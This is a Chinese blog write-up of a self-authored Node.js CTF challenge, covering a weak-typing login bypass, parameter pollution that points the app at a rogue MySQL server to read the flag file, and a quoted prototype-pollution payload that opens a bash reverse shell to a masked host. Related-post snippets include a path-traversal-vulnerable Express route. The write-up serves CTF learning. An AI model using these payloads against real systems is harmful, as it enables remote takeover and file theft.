一道有趣的关于nodejs的ctf题

最新推荐文章于 2024-05-23 14:45:00 发布
最新推荐文章于 2024-05-23 14:45:00 发布
阅读量4.3w 收藏 14
点赞数 6
分类专栏: ctf的wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/niexinming/article/details/103675719
版权
本文分享了一道基于NodeJS的CTF题目解决方案,利用弱类型特性与参数污染技巧绕过登录验证,深入探讨了mysql客户端任意文件读取及远程数据库控制的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先,出题背景是公司要求我出一道简单的ctf题目,正好我最近在学习nodejs相关的东西,于是我就出了这道题目,题目源码,我已经打包上传到了GitHub上,地址是: https://github.com/niexinming/prototype_pullotion/
如果有兴趣,可以下载下来,研究一下

这个题目开局是一个登陆页面
在这里插入图片描述

在这里你会想到什么呢?爆破?nononono~
你要想到的是这是一道nodejs的题目啊,js本身就是一种弱类型语言,所以,你可以改变数据类型,来看看它会不会产生非预期的效果,你可以参考我以前翻译的过的文章
https://blog.youkuaiyun.com/niexinming/article/details/84889275

这篇文章中就介绍如何通过改变数据类型来绕过登录,所以,这个题目通过如下的方式就可以绕过登录:
首先抓包:
在这里插入图片描述

然后,修改用户名密码为数组,因为用户名和密码都是数组的第一个,所以只要把用户名和密码改成
{“user”:[0],“passwd”:[0]},就可以绕过登录

在这里插入图片描述
绕过登录之后,发现有一个地址,打开这个地址:http://106.75.10.182:3000/kfhkhkdsdshalkhkhaklhlahlkkhdfklhhjkhgdajgfhjaghghjasgfjh//jflkdsajklfjsakljfjkhkjhdsfgasdyuuyueuwguguiuidgffddjfj.js
发现是nodejs后端的源码:
在这里插入图片描述
可以看到这个题目可以通过控制host参数去改变mysql的连接地址,这里有个mysql客户端任意文件读取的问题,可以参考这个文章:https://blog.youkuaiyun.com/ls1120704214/article/details/88174003

但是如果直接在json中传递{“host”:””},根本不会有任何效果,因为我在57行写了过滤

if (body.host != undefined) {

如果发现有直接传递进来的host参数,nodejs就报错退出,所以,通过仔细观察源代码,发现这个代码有参数污染问题,关于参数污染,可以参考这篇文章:
https://www.4hou.com/technology/16328.html
所以就可以通过构造如下参数去改变host参数,把host参数变成我们自己mysql服务器的地址
首先,我要先把我服务器中的Rogue-mysql-Server 的rogue_mysql_server.py 中的filelist改成flag的地址
在这里插入图片描述
然后启动我的这个恶意的mysql服务器:
在这里插入图片描述
之后,我把host地址通过参数污染的方式改到我的这台服务器:
在这里插入图片描述
发送数据包后,我的服务器中收到了一个请求:
在这里插入图片描述
然后,去查看日志,就会看到flag

在这里插入图片描述
一个小插曲,因为我刚刚接触nodejs,所以,没有意识到里面其实有很多安全问题,我在出题的过程中错误的使用了nodejs的模板,导致Virink师傅用一个payload就把我的服务器给打下来了(拿下了服务器的控制权),通过跟virink 的交流我也学到了很多东西,最后我兑现了我的承诺,给师傅发了一个大红包
在这里插入图片描述

下面是virink的payload,发出来给大家学习

{"user":"test","passwd":"test","__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx.xxx.xxx.xx/6666 0>&1\"');var __tmp2"}}

后来我把这个漏洞修复了,等了两周,再也没有人做出来

面试整理|50个NodeJS面试
pengxian00007的博客
07-14 9276
面试整理|50个NodeJS面试初级NodeJS面试中级NodeJS面试高级NodeJS面试Nodejs仿微博网站》 Node.js是一种服务器端脚本工具,使用它可以轻松构建从简单的命令行程序到复杂的企业级 Web 应用程序的所有内容。 本篇文章,将为大家分享50个和NodeJS相关的面试及其解析,难度分为:初级、中级、高级三个部分,由易到难,循序渐进。 初级NodeJS面试 Q1、如何区分 JavaScript 和 Node.js? 特征 JavaScript NodeJS
Nodejs面试
永生天地
02-18 970
1、Node模块机制 1.1 请介绍一下node里的模块是什么 Node中,每个文件模块都是一个对象,它的定义如下: 1 2 3 4 5 6 7 8 9 10 11 12 function Module(id, parent) { this.id = id; this.exports = {}; this.parent = parent; thi...
AST-injection-ctf:在Nodejs应用中演示AST注入
04-23
AST注射CTFNodejs应用中演示AST注入。 需要Docker和docker-compose! 生成Node.js应用程序映像 docker build -t demo-ctf . 构建映像时忽略所有红线:))) 泊坞窗组成 docker-compose up -d 运行应用 转到本地主机:3000 重新加载,直到一切正常 尝试RCE ^^ 主意 浏览网站的功能,我们可以得出以下结果: 该站点用于统计功能,图形功能 勒索,勒索软件和受害者有3种主要模型 访问每个模型的路径以检查功能,请参阅两个模型勒索软件和受害者都有查看详细信息的功能。 检查两个模型的详细信息,查看受害者只能下载信息,勒索软件可以上传新配置以执行更新,可以上传文件以利用安全漏洞 在正确的功能中观察网站的源代码,以上传勒索软件配置文件: 使用模板引擎的网页是刀片 更新功能已重新注释以进行维护 var c
node.js 入门 ctf向 简单了解
qq_66748496的博客
01-11 1042
阻塞调用是指调用结果返回之前,当前线程会被挂起,一直处于等待消息通知,不能够执行其他业务,函数只有在得到结果之后才会返回。两个中间件,express.json用于解析json请求,express用于解析url编码的内容,这两者在。非阻塞和阻塞的概念相对应,指在不能立刻得到结果之前,该函数不会阻塞当前线程,而会立刻返回。当一个同步调用发出后,调用者要一直等待返回消息(或者调用结果)通知后,才能进行后续的执行。URL到函数的映射。同步和异步指的是线程之间的关系,阻塞和非阻塞指的是同一线程的状态。
Nodejs ctf 基础
qq_61768489的博客
07-23 2099
总结数字与字符串比较时,会优先将纯数字型字符串转为数字之后再进行比较;而字符串与字符串比较时,会将字符串的第一个字符转为ASCII码之后再进行比较,因此就会出现第五行代码的这种情况;总结空数组之间比较永远为false,数组之间比较只比较数组间的第一个值,对第一个值采用前面总结的比较方法,数组与非数值型字符串比较,数组永远小于非数值型字符串;数组与数值型字符串比较,取第一个之后按前面总结的方法进行比较。应该执行eval()函数,可以执行js代码,那么就可以执行系统命令了。依旧是get传eval。...
CTFnodejs入门【持续更新】
weixin_51458899的博客
02-23 3030
ctfnodejs入门
记ByteCTF中的Node
WindRunnerMax
12-14 3328
记ByteCTF中的Node 我总觉得字节是跟Node过不去了,初赛和决赛都整了个Node目,当然PHP、Java都是必不可少的,只是我觉得Node类型的比较少见,所以感觉挺新鲜的。 Nothing 决赛的Node型,目如下: Can you get flag in a fully enclosed nodejs environment? http://39.106.69.116:30001 http://39.106.34.228:30001 直接访问http://39.106.34.228:
NodeJS有难度的面试(能答对几个)
01-02
1、Node模块机制 1.1 请介绍一下node里的模块是什么 Node中,每个文件模块都是一个对象,它的定义如下: function Module(id, parent) { this.id = id; this.exports = {}; this.parent = parent;...
NodeJs技术经典文档
07-22
资源名称:NodeJs技术经典文档资源目录:【】Node.js开发指南_中文正版【】nodejs开发指南pdf及源码及win安装程序【】nodejs手册中文【】NodeJs教程【】umav4simple【】七天学会NodeJS【】七天学会NodeJS【】深入浅...
ctf.show的 node.js(web334-web342)
wanan的博客
09-30 722
ctf.show的 node.js(web334-web342)
CTF实验室-超简单的js
chiou9207的博客
04-28 1203
超简单的js 源代码: <html><head><title>超简单的js</title></head><body><p>这是从一个老外那里抄来的,应该很简单的。。吧?</p><fo...
CTF比赛的一道javascript
qq_32445689的博客
03-14 3538
CTF比赛中的一道javascript,考察了很多知识。在做的过程也很有趣,在此发表给大家
ctfshow-web入门 nodejs篇部分
volcano的博客
05-16 2536
ctfshownodejsweb334web335web336web337web338参考博客 nodejs web334 先下载附件,在user.js中发现了账号密码 module.exports = { items: [ {username: 'CTFSHOW', password: '123456'} ] }; 开环境,直接输入账号密码是错的,具体原因在login.js中 var findUser = function(name, password){ return users.
[CTF_网络安全] 攻防世界 simple_js 解详析
qingkahui24689的博客
05-23 2253
[CTF_网络安全] 攻防世界 simple_js 解详析,该考察Javascript代码的解读及不同数值类型的转换姿。我们下次见,
js
weixin_39147099的博客
08-15 504
记录一下自己遇到的一些js目 &amp;lt;!DOCTYPE html&amp;gt; &amp;lt;html lang=&quot;en&quot;&amp;gt; &amp;lt;head&amp;gt; &amp;lt;meta charset=&quot;UTF-8&quot;&amp;gt; &amp;lt;title&amp;gt;javascrip
[VNCTF 2021]Ez_game-JS类目学习记录
cjdgg的博客
03-15 2527
[VNCTF 2021]Ez_game-JS类目学习记录 之前没咋做过js的,也没写过js项目,但还是能简单看懂一些js代码,基础有点薄弱,所以记录下这次的做。 这就是游戏的开始叭,你有一个回旋镖作为武器,然后金币是0,生命值是3,这个游戏就是需要你打怪过关,应该是让你通关才会给你flag,那就先玩一局看看叭 手残党第二关就没了,玩了一局唯一的感受就是好难玩,不过死后它提示可以按ESC,按了下应该是重生,不过属性保留 emem啥也不说既然这个游戏要通关才给flag,那我就找找过关函数 还真有,
ctfshow nodejs
fmyyy1的博客
07-16 1309
334 源码给了 登录成功就能拿到flag var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item
CTFSHOW nodejs
羽的博客
02-18 7330
web334 在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。 在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。 所以用ctfſhow 123456登录就可以出flag了 web335 require( 'child_process' ).spawnSync( 'ls', [ '/' ] ).stdout.toString() web336 require( 'child_process' ).spawnSync( 'ls
ctfshow nodejs wp
yink12138的博客
01-12 459
ctfshow nodejs部分的wp
ctf nodejs
最新发布
01-05
### CTF竞赛中的Node.js挑战目 在CTF(Capture The Flag)竞赛中,Node.js相关的挑战通常涉及Web安全漏洞利用、逆向工程以及代码审计等方面。这些挑战旨在测试参赛者对于JavaScript运行环境的理解程度及其安全性弱点的认知。 #### Web应用攻击面分析 针对基于Node.js构建的应用程序可能存在的风险点进行探索是一项重要技能。这包括但不限于SQL注入、跨站脚本(XSS)、命令执行等常见漏洞[^1]。 #### 实际案例展示 为了更好地理解如何设计或解决这类问,可以参考一些公开平台上分享的真实比赛实例。GitHub上的Awesome项目集合提供了丰富的资源链接,在其中能够找到许多关于CTF赛事的信息和练习材料[^2]。例如: - **Express框架下的路径遍历漏洞**:通过构造特定请求参数来读取服务器上任意文件的内容。 ```javascript app.get('/download/:file', function(req, res){ var filePath = __dirname + '/uploads/' + req.params.file; fs.readFile(filePath, 'utf8', (err,data)=>{ if(err){return console.error(err);} res.send(data); }); }) ``` 上述代码片段存在明显的安全隐患,因为它允许用户指定`/download`接口后的`:file`部分从而访问到不应该被外部触及的数据。 #### 安全编码实践建议 为了避免类似的错误发生,在编写Node.js应用程序时应遵循最佳的安全开发指南,比如验证输入合法性、限制敏感操作权限范围等措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值